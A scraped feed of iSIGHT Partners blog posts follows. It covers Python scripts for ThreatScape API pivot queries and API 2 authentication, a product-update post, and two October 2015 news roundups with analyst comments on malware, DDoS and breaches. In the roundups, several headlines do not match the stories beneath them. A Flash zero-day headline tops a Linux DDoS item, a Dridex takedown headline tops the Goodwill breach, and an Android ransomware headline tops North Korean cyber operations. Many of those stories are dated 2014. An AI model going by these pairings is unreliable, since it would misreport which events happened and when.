for each in parsed_json[‘message’][‘publishedIndicators’]:
  if each[‘sha256’] != None:
    sha256s.append(each[‘sha256’])

Now I have a list of related SHA256 hashes in the sha256s list variable:

   [’74dc260aa1b5de03b157cefa384e5384e591710d28b4db33b2f2e4d1539f9d16′, ’78e155b216d07387cb7f6766d3a1f9fd1133384e1df9c1275927ec711d2c4079′, …]

As show in Figure 1, we can now submit these hashes off to our endpoint detection tools to hunt for and identify any other instances of the same ransomware in our enterprise.

image 1

Figure 1. Python submission of SHA256 to the ThreatScape API, post-processed in Python to identify related SHA256 values to support additional hunt mission. Note the other values available in the pivot.

The response provides all related indicators that iSIGHT is aware of on the original report and any additional reports, including items such as IP, Domain, URL, User Agent, and more. In this example we are just obtaining additional SHA256 values for a hunt mission. If your security tool only supports another hash type, such as MD5, you can change ‘sha256’ in the above code to ‘md5’ to get those.

A second case study might revolve around a Hacktivist incident that relates to iSIGHT intelligence with an ID of 15-00008884, and we want to expand our analysis into the threat by consuming everything iSIGHT knows about them. We can make the following pivot query to grab related intelligence:
   /pivot/report/15-00008884/report

Assuming as before that we’re requesting JSON responses, we can parse the response again this way:

#assuming data holds the response from the API
parsedJson = json.loads(data)
relatedIntel = []
for each in parsedJson[‘message’]:
  relatedIntel.append(each[‘reportId’])

Now we have a list of related intelligence in the relatedIntel list variable:

   [’15-00008042′, ’15-00006328′, ’15-00007122′, ’15-00007078′, ’15-00006378′, ’15-00006578′, ’15-00006544′, ’15-00006528′, ’15-00006302′, ’15-00003050′, ‘Intel-1021023′, ’13-27820’]

As shown in Figure 2, we can leverage the list to grab the intelligence products for further analysis, to begin to expand our aperture to other indicator sets, or a myriad of other options that we will cover in future posts. In this case, the above list includes an overview of the threat group, specific intel about campaigns they have run, services they are selling, intelligence on data they’ve dumped, and technical intelligence on the vulnerabilities they are targeting.

image 2
Figure 2. Python submission of report 15-00008884 to the ThreatScape API, returning a list of related reports in JSON format. The list of returned reports are then available via a separate API query in JSON, XML, HTML, PDF, and STIX formats.

Let Us Know What You’re Doing…

These examples above just brush the surface of the pivot queries – we hope you use them soon so we can get some direct feedback to let us know what else you want from the API and what you want to hear more about from us! If you’re not an existing iSIGHT client, hopefully the info above has raised some eyebrows in terms of what we can do to help you…if so, please drop us a line here and let’s talk more.

The post Have You Pivoted Yet? Rapidly Move Between Data and Intelligence for Correlation and Alert Prioritization appeared first on iSIGHT Partners.

ThreatScape Media Highlights Update – Week Of October 14th

$
0
0

The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.


 Wednesday, 14 October 2015 

Download PDF Version Here

NEW ZERO-DAY EXPLOIT HITS FULLY PATCHED ADOBE FLASH; USED TO TARGET USG

On Target

FROM THE MEDIA
Cyber criminals are infecting Linux servers with malware capable of launching strong distributed denial-of-service (DDoS) attacks, according to Akamai Technologies. Two attacks have been launched against the entertainment and other industries. One of the executed campaigns peaked at 119 Gbps and 110 Mpps.
Read the Story: Security Week

iSIGHT PARTNERS ANALYST COMMENT
Cyber criminals are increasingly using malware designed to infect Linux webservers, including other types of malware such as “Storm.bot.” Linux servers are a logical choice for conducting strong DDoS attacks since Linux is usually run by web servers and hosting providers, which have large amounts of bandwidth available. We recommend enterprises routinely conduct vulnerability patching, because widely-used applications such as Apache Tomcat, Apache Strut and Elasticsearch are known to be vulnerable.

RELATED iSIGHT PARTNERS REPORTS
11-16375 (Apache Vulnerability Incorporated into DDoS Tool), 14 Aug. 2014
Intel-1076834 (Threats to Linux Operating Systems), 31 March 2014
Intel-1006884 (Server-Based DDoS Malware ‘Storm.bot’), 16 Jan. 2014


COPS KNOCK DOWN DRIDEX MALWARE THAT EARNED ‘EVIL CORP’ CYBERCRIMINALS AT LEAST $50 MILLION

Off Target

FROM THE MEDIA
Goodwill Industries International has confirmed a data breach affecting payment cards used at approximately 330 stores. The affected stores make up approximately ten percent of Goodwill stores, all of which used the same payment processing system affected by the malware. Reportedly, the malware was intermittently active between February 2013 and August 2014.
Read the Story: Bank Info Security

iSIGHT PARTNERS ANALYST COMMENT
As earlier media reports speculated, it appears that Goodwill stores were compromised through a third-party payment service used by some of its stores. Similar to the recent breach at some UPS Store locations, the credential compromise at Goodwill is limited in scope and will likely affect relatively few victims. However, the incident does highlight the importance of properly auditing security practices used by third-party vendors that could be an infection vector.

RELATED iSIGHT PARTNERS REPORTS
ThreatScape Media Highlights, 21 Aug. 2014 “UPS Hit by Data Breach”
ThreatScape Media Highlights, 23 July 2014 “Goodwill Industries Investigates Possible Card Breach”
14-32028 (Analysis of “Backoff” POS Malware Implicated in Recent Breaches), 1 Aug. 2014


ANDROID RANSOMWARE GETS A BETTER UI TO SCARE PEOPLE MORE EFFECTIVELY

FROM THE MEDIA
North Korea is reportedly conducting cyber warfare outside its borders. According to HP’s August 2014 Security Briefing, countries such as China and South Korea are being targeted. The report details, among other things, a North Korean hacking unit located in Pyongyang that depends on a command post based in China.
Read the Story: CSO Online

iSIGHT PARTNERS ANALYST COMMENT
It is reasonable to assume North Korea conducts cyber operations from outside its borders as the country greatly relies on China and other countries for its internet access and limited global web presence. iSIGHT Partners has previously reported information relayed by a defector indicating North Korea’s Unit 121 conducts cyber operations from the Chilbosan Hotel in Shenyang. Additionally, in 2009 North Korean hackers were suspected of launching a DDoS attack against US and South Korean government and banking websites. South Korean officials pointed to an IP address traced back to North Korea’s Ministry of Post and Telecommunications, which leased the IP address in China.

RELATED iSIGHT PARTNERS REPORTS
Intel-809535 (Baseline: North Korean Cyber Capabilities), 25 April 2013
Intel-432762 (Defector Claims North Korean Government is Training Cyber Warriors), 20 July 2011


MAJORITY OF AUSTRALIAN ISPS NOT READY FOR METADATA LAWS THAT COME INTO FORCE TODAY

FROM THE MEDIA
Cyber criminals launching recent attacks with the Angler exploit kit have been making detection more difficult by injecting malware into systems’ memory. According to an independent malware researcher known as Kafeine, this practice is not new. It is, however, not commonly seen in larger-scale attacks as the malware cannot persist once the RAM is cleared.
Read the Story: Computer World

iSIGHT PARTNERS ANALYST COMMENT
The media claim that memory-based malware is typically used by state-sponsored actors is inaccurate. This broad category of malware has been associated with both cyber espionage actors and financially motivated cyber criminals at various points. Additionally, the idea that cyber criminals prefer persistence over stealth is a false dichotomy. Once stealth infection is achieved, other measures can ensure malware persistence.

RELATED iSIGHT PARTNERS REPORTS
ThreatScape Media Highlights, 5 Aug. 2014 “Registry-Residing Malware Creates No File for Antivirus to Scan”
14-32083 (Analysis of Malware Running Entirely in Memory), 7 Aug. 2014
Intel-1022127 (Analysis of Flash Vulnerability to Angler Exploit Kit),  14 Jan. 2014


FAKE BANKING AND COMMERCE SITES WRONGLY ISSUED AUTHENTICATION CERTIFICATE

On Target

FROM THE MEDIA
Fraudulent websites appearing as Apple iTunes, Halifax and Natwest were incorrectly issued legitimate security certificates and have been capturing victim credentials. Malicious actors used typo squatting and other methods to create domains that would appear legitimate. Services such as CloudFlare, Symantec and GoDaddy issued hundreds of legitimate certificates to these malicious websites.

Read the Story: The Telegraph

iSIGHT PARTNERS ANALYST COMMENT
Adversaries are aware that certificates are used as a mechanism for establishing trust, and as such, regularly attempt to obtain them for phishing sites and for signing malware. By using certificates issued by legitimate services, actors can bypass some security checks and make their activities appear to be legitimate at first glance. We are certain malicious actors will continue activity intended to abuse the certificate system to support malicious activity, not only for cyber crime, but also espionage and targeted intrusion activity.

RELATED iSIGHT PARTNERS REPORTS
15-00010768 (Shifu: Malware Behavior, Capabilities and Communications), 8 Oct. 2015
15-00009218 (Update on ‘Sphinx’ Banking Trojan: Vendor Unreliability Tarnishing Product Credibility), 9 Sept. 2015
15-00005566 (Duqu 2.0 Leveraging Stolen Certificates; Possible ICS Module Identified), 21 July 2015


 

CHROME EXTENSION LETS YOU HIJACK YOUR FRIEND’S BROWSER

On Target

FROM THE MEDIA
Mozilla’s latest browser version, Firefox 32, now supports public key pinning, a mitigation that protects users from man-in-the-middle attacks, in addition to security updates. Public key pinning binds a set of public keys issued by a known good certificate authority. When a user visits a website protected by public key pinning and an unknown certificate is detected, the browser will reject the connection.
Read the Story: Threat Post

iSIGHT PARTNERS ANALYST COMMENT
We agree with the article’s assessment that the implementation of public key pinning will help protect Firefox users from man-in-the-middle attacks. However, in the short-term, this protection will be limited to certificates forged for a handful of Twitter domains and Mozilla add-on sites, with pinsets for other sites to follow at a later time.  Additionally, we have yet to observe any exploit code or exploitation activity targeting any of the eight vulnerabilities addressed in the patch.

RELATED iSIGHT PARTNERS REPORTS
Intel-1225580 (Use of Man-In-The-Middle Attacks to Install Mobile Malware), 28 Aug. 2014
14-32389 (Use-After-Free Vulnerability (CVE-2014-1563) Patched by Mozilla), 3 Sept. 2014
14-32388 (Use-After-Free Vulnerability (CVE-2014-1567) Patched by Mozilla), 3 Sept. 2014

The post ThreatScape Media Highlights Update – Week Of October 14th appeared first on iSIGHT Partners.

ThreatScape Media Highlights Update – Week Of October 21st

$
0
0

The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.


 Wednesday, 21 October 2015 

Download PDF Version Here

MALWARE DISGUISES AS GOOGLE CHROME BROWSER CLONE

On Target

FROM THE MEDIA
A modified Google Chrome browser is enabling attackers to show unwanted ads and redirect victims to malware infection pages. The browser clone, dubbed eFast, is based on the Chromium open source browser. The eFast browser not only redirects users to malware infection pages but also installs an infected .exe file during installation.
Read the Story: Softpedia

iSIGHT PARTNERS ANALYST COMMENT
The eFast browser is one of several (including Unico Browser, BoBrowser, MyBrowser and others) based on the open-source Chromium browser that purport to be helpful but instead serve ads and collect user information. The infected .exe file dropped installs the adware Eorezo, which initiates advertisement pages in Microsoft Explorer. iSIGHT Partners encourages the use of established legitimate browsers, such as Safari, Firefox or Chrome.

RELATED iSIGHT PARTNERS REPORTS
15-00008802 (Notable Developments in Cyber Crime Tools during July 2015), 27 Aug. 2015
Threatscape Media Highlights (Google Pulls Listening Software from Chromium), 26 June 2015


HEALTH CARE ORGS FALL SHORT ON SOFTWARE SECURITY

On Target

FROM THE MEDIA
A recent Cigital study found that, the health care sector is falling behind other large industries in software security. Cigital’s Building Security in Maturity Model (BSIMM) found that health care organizations had lower scores than organizations in the financial services and consumer electronics industries, for example.
Read the Story: CSO Online

iSIGHT PARTNERS ANALYST COMMENT
Reports continue to find healthcare organizations lacking in security, and we continue to observe adversaries targeting the sector for patient health information, personally identifiable information and financial data. Poor software security practices enable adversaries to obtain unauthorized access or information and could result in these organizations facing financial repercussions.

RELATED iSIGHT PARTNERS REPORTS
ThreatScape Media Highlights (Healthcare Sector 340 Percent More Prone to it Security Threats), 25 Sept. 2015
Intel-1141784 (Malicious Mobile Health Applications May Appear as the Use of Mobile Health Apps Grows), 29 June 2014
Intel-1137721 (Recent Service Advertisements Indicate Chinese Actors Expanding Their Targeting of Health Care Data), 20 June 2014


ANONYMOUS ATTACKS TWO JAPANESE AIRPORTS

FROM THE MEDIA
Anonymous launched DDoS attacks against two major Japanese airports’ websites. The attacks were issued in protest over the Japanese dolphin-hunting industry. Airport authorities noted that air traffic was not affected, however Narita airport’s website was down for 8 hours.
Read the Story: SC Magazine

iSIGHT PARTNERS ANALYST COMMENT
While the article attributes the airport attacks to “the hacktivist group Anonymous,” we have only observed the Twitter user “@_RektFaggot_” claim responsibility. It is worth noting that any actor can claim attacks in the name of Anonymous and that the term represents an amorphous movement rather than a cohesive group. We surmise that recent DDoS attacks against the Japanese Government, including against the two airports, are being conducted primarily by the actor @_RektFaggot_ .

RELATED iSIGHT PARTNERS REPORTS
15-00011520 (Recent #OpKillingBay Activity), 19 Oct. 2015
15-00010958 (Overview of these DDoS Attacks Against Two Japanese Airports), 12 Oct. 2015
Intel-1028112 (Report on a Hacktivist Group’s Activity Motivated in Part by Animal Rights), 29 Jan. 2014


INSECURE INTERNET-CONNECTED KETTLES HELP RESEARCHERS CRACK WIFI NETWORKS ACROSS LONDON

FROM THE MEDIA
Researchers with Pen Test Partners discovered a security vulnerability in the iKettle, a WiFi kettle, that allowed them to crack WiFi network passwords. The iKettle allows users to connect their kettle to their home WiFI network and use an accompanying mobile app to activate the device from a location within their home. The researchers were able to use a directional antenna aimed at the target home to force the kettle into disconnecting from the home’s WiFi network and reconnecting to a spoofed network using the home network’s password, thus revealing the password to the researchers.
Read the Story: Softpedia

iSIGHT PARTNERS ANALYST COMMENT
The theft of network credentials as a result of an “Internet of Things” vulnerability demonstrates the risk posed by introducing seemingly innocuous internet-enabled devices into a network. Enterprises considering introducing WiFi-enabled devices should ensure these systems have been tested for vulnerabilities, have a mechanism for receiving security updates, and are recognized as part of the attack surface.

RELATED iSIGHT PARTNERS REPORTS
ThreatScape Media Highlights (Got a Samsung Smart Fridge? Your Gmail Log-In Could be Open to Cyber Attacks), 27 Aug. 2015
15-00001826 (Open Interconnect Consortium Establishes New Liaisons to Advance IoT Interoperability Standards), 23 March 2015
Intel-1234296 (September 2014 Baseline for the ‘Internet of Things’ (IoT): Excitement Continues, but Security Concerns Growing), 15 Sept. 2014


IS IT STILL POSSIBLE TO DO PHONE PHREAKING? YES, WITH ANDROID ON LTE

On Target

FROM THE MEDIA
South Korean researchers recently discovered weaknesses in South Korean and US VoLTE networks that could allow an actor to spoof phone calls, overbill customers and conduct denial-of-service attacks. According to Carnegie Mellon University’s Computer Emergency Response Team (CERT), each mobile phone operator’s flaws are different and thus will require tailored updates. According to Google, an Android software patch will be released next month. CERT states that iOS is not affected.
Read the Story: PC World

iSIGHT PARTNERS ANALYST COMMENT
Many of the attacks described in the researchers’ paper involve installing a malicious app on the victim’s device; this app could then perform activities such as placing data or video calls or blocking calls made by the device’s owner. We have not yet noted any examples of malicious apps that abuse VoLTE networks, but it would likely be attractive to some mobile malware developers; for example, an app could place calls to a premium number affiliated with the attackers, in much the same way that current SMS-sending malware operates.

RELATED iSIGHT PARTNERS REPORTS
Intel-1234226 (Common Types of Mobile Malware), 10 Sept. 2014
Intel-1026681 (Russian Premium SMS Malware), 18 Feb. 2014
Intel-1011405 (Android Voice-Call Malware), 19 Dec. 2013


The post ThreatScape Media Highlights Update – Week Of October 21st appeared first on iSIGHT Partners.

What do you mean you’re not on API 2 yet?

$
0
0

As we interact with our customers and partners, we’ve run into instances where users aren’t yet leveraging ThreatScape API 2, which was released early this year. When we talk to our users about it further, the reasoning we’re hearing is that they’re not sure what changes they have to make to their existing API 1 scripts to move to API 2. We also hear that they’re not sure if they’ll be able to continue using the same queries…

I’m happy to report that there’s good news to be had. With some minor changes to most scripts, you should be able to start using API 2 for all of your automated iSIGHT intelligence needs!

Before we get started…

…we need to make sure that we have the right keys for API 2. API 2 does use different keys from API 1. This was done for a number of reasons, including stronger authentication and simpler requests for specific formats. The good news is that separating the keys means that your API 1 integrations and scripts will continue to function successfully while you work on making the necessary changes to leverage API 2.

To get the correct keys all you need to do is reach out to your Client Engagement or Partner team representative. They should be able to provide you with keys in short order.

So what’s the big deal?

Actually, it’s not that big of a deal to convert to API 2. The most significant changes we need to implement are based on the new headers and authentication scheme introduced in API version 2.0. In the sections below, I’m going to walk through updating your API 1 authentication code so that your script works with API 2

Reference API 2 documentation on headers can be found here, and documentation on authentication here.

Note: All code references here will be for Python. Keep an eye out for more information on other languages as we continue to publish more API information.

API1

The first iteration of the API only required two headers:

  • X-Auth – This was simply the user’s public API key.
  • X-Auth-Hash – This was a SHA256 HMAC hash of the user’s private key.

To successfully authenticate, you had to provide your public key and hashed private key. Let’s take a look!

Here’s my old API 1 script. Here’s the part we’re interested in:

public_key = ‘YOUR_PUBLIC_KEY’
private_key = ‘YOUR_PRIVATE_KEY’

search_query = '/view/iocs?format=json'

hashed = hmac.new(private_key, '', hashlib.sha256)

headers = {
     'X-Auth' : public_key,
     'X-Auth-Hash' : hashed.hexdigest()
}

As you can see, we’re hashing the private key in the code above. This results in a simple header that contains only X-Auth and X-Auth-Hash:

{'X-Auth': ' YOUR_PUBLIC_KEY', 'X-Auth-Hash': 'BORINGHARDTOREADHASH'}

After that, we build the request itself by combining the API domain (api.isightpartners.com), query and the headers. Then you can use the library of your choice to manage your response. See the linked sample, referenced above, for an example of how to print the response to your terminal window.

API2

With the release of API 2, we definitely beefed up our authentication requirements for successful requests, simplified the process to request response formats, and added a timestamp field to make it easier for our global customers to grab our intel no matter where they or their security integrations reside. We now have a much more diverse header list:

  • X-Auth – Still just the user’s public API key.
  • X-Auth-Hash – While still a SHA256 HMAC hash, we’re including a lot more data in the calculation this time around. We’ll come back to this in a moment.
  • Accept – This is populated with the output format desired for the query response.
  • Accept-Version – This is populated with the API 2 version that the user would like to query. As we update schemas and formats, we will only do so as part of a version change. This allows users who have existing integrations to keep them running as they test new versions.
  • Content-Type – This header is specific to POST requests only, and indicates the type of content being uploaded. We won’t be using this in our code example for this exercise.
  • Date – This is exactly what it sounds like! The date format must conform to section 5 of RFC 822. It will look similar to “Thu, 15 Oct 2015 16:52:50 -0400”.

As I pointed out above, the hash calculation is a bit more involved than it was in API 1. To calculate the hash, you need to concatenate the following items (don’t worry, we’ll show a code sample for this too):

  • The query string
  • The Accept-Version header
  • The Accept header
  • The timestamp in the Date header

These values are then hashed using the same functionality used in API 1.

Let’s take a look at how we accomplish this in API 2:

public_key = ‘YOUR_PUBLIC_KEY’
private_key = ‘YOUR_PRIVATE_KEY’

search_query = '/view/iocs'

accept_version = '2.0'
accept_header = 'application/json'
time_stamp = email.Utils.formatdate(localtime=True)

hash_data = search_query + accept_version + accept_header + time_stamp
hashed = hmac.new(private_key, hash_data, hashlib.sha256)

headers = {
     'Accept' : accept_header,
     'Accept-Version' : accept_version,
     'X-Auth' : public_key,
     'X-Auth-Hash' : hashed.hexdigest(),
     'Date' : time_stamp,
}

Ok, don’t let all of the variables scare you. I’m using them here so I only have to change them in one place when I want to update my code. As you can see, I’m using the hash_data variable to concatenate everything that isn’t an API key for hashing. You could do this manually, but this helps me keep everything organized.

You’ll also notice that I’ve dropped the ?format=json argument from the search_query. This is because this argument has been moved to the Accept header (accept_header variable in the code sample). It’s important to note this change as you will receive an error if the ?format= argument doesn’t match the accept_header.

Using this code will result in the following header:

{'Date': 'Thu, 15 Oct 2015 16:52:50 -0400', 'X-Auth-Hash': 'BORINGHARDTOREADHASH', 'Accept-Version': '2.0', 'Accept': 'application/json', 'X-Auth': ‘YOUR_PUBLIC_KEY’}

Look at all the new fields! After this is accomplished, it’s business as usual… Seriously. It’s exactly the same as the code we used in our API 1 script. You shouldn’t have to make any further changes to your script to use API 2!

If you want to look at an example, check out the new fangled API 2 script.

Or if you want a quick visual representation, here’s a screen grab of both scripts side by side (click to expand).


how it works

That’s It!

I’ve used a very simple code example utilizing the Indicators of Compromise endpoint, but you should be able to take this guidance and update any of your API 1 code to leverage API 2. As always, you can refer to the ThreatScape API documentation on our website for reference while troubleshooting or working with the new query endpoints. Happy coding!

 

The post What do you mean you’re not on API 2 yet? appeared first on iSIGHT Partners.

What’s new in ThreatScape?

$
0
0

If you missed our recent webinar with Rick Holland from Forrester Research, check out the recording here. Rick provided a sneak peek into Forrester’s upcoming Threat Intel Market report that will be published shortly. He described five key tenets that distinguish threat intelligence providers:

  • Planning and direction
  • Collection
  • Processing
  • Analysis and production
  • Dissemination

We whole-heartedly agree with Rick’s analysis. His tenets are not only a good way to differentiate intelligence providers but they also offer good segue to introduce you to our latest ThreatScape innovations. The changes we made span the tenets.

Our latest ThreatScape enhancements are particularly important for Security Operations Center (SOC) and Incident Response teams. We enabled much quicker access to new IOCs, provided additional tags and improved navigation across iSIGHT’s rich intelligence. With these enhancements SOC and IR teams can quickly and more completely understand the threats they are facing, speed investigations and more fully respond to sophisticated attacks.

We want to thank our customer for the continued input. The following changes are already available to customers.

Accelerated IOC Delivery

In keeping with our ongoing focus of providing finished intelligence to customers with ever increasing speed and quantity, but with the same level of accuracy and context, we improved our end-to-end process and made important changes to our internal ThreatScape Intelligence Platform (TIP). TIP is our intelligence collection and analysis system. TIP integrates our human intelligence with open source and our automated technical collections–including botnet, DDoS, malicious infrastructure and malware tracking systems.

The internal process and technology enhancements we made reduced the time from detection to delivery of key IOCs through ThreatScape API from days or hours to seconds. These dramatic improvements have been made to an important subset of ThreatScape Cyber Crime IOCs and we will address additional ThreatScape products moving forward. While we significantly sped up indicator delivery, we maintained the accuracy and fidelity customers expect from iSIGHT. We absolutely understand the need for speed, but also know that if we fail to provide well-validated indicators or indicators with out context, SOC teams end up with the worst possible outcome–more alerts and alarms and no good way to prioritize them.

Enhanced Intelligence Relevancy

This feature enables customers to run automated queries and determine if they are being specifically targeted. We introduced a new “target” data tag that is defined as an entity targeted by malware or actor. This tag could denote a URL (web objects), IP (DDoS), Domain (DDoS, web injects), specific components on a website (application that triggers inject) and more.

Below is an example of an API query in Python using the new target tag. The query pulls the last fourteen days of targeting information from our finished intelligence holdings for the Dridex malware–used extensively in cyber crime campaigns.

public_key = ‘YOUR_PUBLIC_KEY’
private_key = ‘YOUR_PRIVATE_KEY’

time_stamp = email.Utils.formatdate(localtime=True)

search_time = datetime.datetime.now() - datetime.timedelta(days = 14)

search_time_in_epoch = int(time.mktime(search_time.timetuple()))

search_query = '/view/targets?since=' + str(search_time_in_epoch) + '&threatType=malwareFamily&value=dridex'

accept_version = '2.1'
accept_header = 'application/json'

hash_data = search_query + accept_version + accept_header + time_stamp
hashed = hmac.new(private_key, hash_data, hashlib.sha256)

headers = {
'Accept' : accept_header,
'Accept-Version' : accept_version,
'X-Auth' : public_key,
'X-Auth-Hash' : hashed.hexdigest(),
'Date' : time_stamp,
}

The query returns a list of target URLs, files or process that can be matched against your infrastructure to discern whether your organization is in the cross hairs. You can download the full script here at iSIGHT Partners GitHub.

Please note: this new indicator is available via API 2.1 or later

Improved Accessibility to Threat Intelligence

We more tightly coupled ThreatScape intelligence and enhanced MySight portal navigation.

New graphical navigation panels that are linked to foundational intelligence called “profile” reports have been introduced in MySight. Each ThreatScape now has a graphical panel that links to profile reports on: actor profiles, malware families, underground forums, exploit kits, regional hacktivist groups or country profiles. See the example below from the Cyber Crime ThreatScape.


how it works

We also introduced “related reports” in MySight. With related reports, you can easily navigate from a profile to a related report about that adversary, for example, or from an indicator back up to a profile report. These changes enable easier access to related threat intelligence that SOC and IR teams can leverage as they cull through events and investigate important threats.

why-is-pivoting-important

Pivoting is not only a MySight feature. As we noted in this blog, we introduced substantial pivoting capability built into ThreatScape API 2.0 in February.

For example, with some python scripting and the ThreatScape API you can now take an indicator such as an SHA256 hash and get additional hunting indicators and intel from reporting at the adversary level to assist in the response.  This can also potentially provide clarity to previous incidents on your network if you pivot through your old incident information.

Have you migrated to API 2 yet?

In order to take advantage of the latest features and improvements, API 2.0 is required (or API 2.1 where indicated). If you have not upgraded to the latest API, we encourage you to do so. Read our blog on how to upgrade from API 1 to API 2.

If you have any questions about what’s new and how to leverage it effectively, please don’t hesitate to reach out to your Client Engagement Manager.

 

The post What’s new in ThreatScape? appeared first on iSIGHT Partners.

Viewing all 59 articles
Browse latest View live